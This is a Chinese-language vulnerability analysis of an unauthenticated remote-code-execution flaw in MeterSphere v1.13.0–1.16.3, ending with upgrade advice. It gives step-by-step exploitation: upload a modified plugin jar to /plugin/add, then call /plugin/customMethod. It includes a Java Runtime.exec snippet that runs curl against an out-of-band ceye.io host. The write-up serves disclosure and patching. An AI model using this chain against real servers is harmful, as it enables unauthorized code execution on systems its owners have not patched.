软件背景
MeterSphere 是一站式开源持续测试平台, 涵盖测试跟踪、接口测试、性能测试、 团队协作等功能,全面兼容 JMeter、Postman、Swagger 等开源、主流标准。
影响版本
MeterSphere >= v1.13.0, <= v1.16.3
漏洞分析
1. 官方已发布修复版本v1.16.4,根据github的commit提交记录对比分析:
不难看出,/plugin接口存在匿名访问,v1.16.4版本针对漏洞修复,仅删除了该接口的匿名访问。
2.查找该接口定义文件PluginController.java:
结合metersphere业务逻辑不难看出,该漏洞是先通过/plugin/add接口上传插件jar包,然后通过/plugin/customMethod接口执行上传jar包内的自定义函数代码。
3. 插件demo
通过搜索metersphere github ,可以看到有现成的插件demo:
GitHub - metersphere/metersphere-plugin-DebugSampler
4. 修改自定义代码
插件内已定义了customMethod方法,我们修改一下,添加我们的验证代码:
Runtime run = Runtime.getRuntime();
try {
Process process = run.exec("curl g3b7p0.ceye.io");
}catch (Exception e) {
e.printStackTrace();
}
5. 重新打包,调用/plugin/add接口上传jar包
mvn clean package
6.调用customMethod类测试验证
ceye收到http请求验证。
漏洞修复建议
官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。
官方链接:https://github.com/metersphere/metersphere/releases/tag/v1.16.4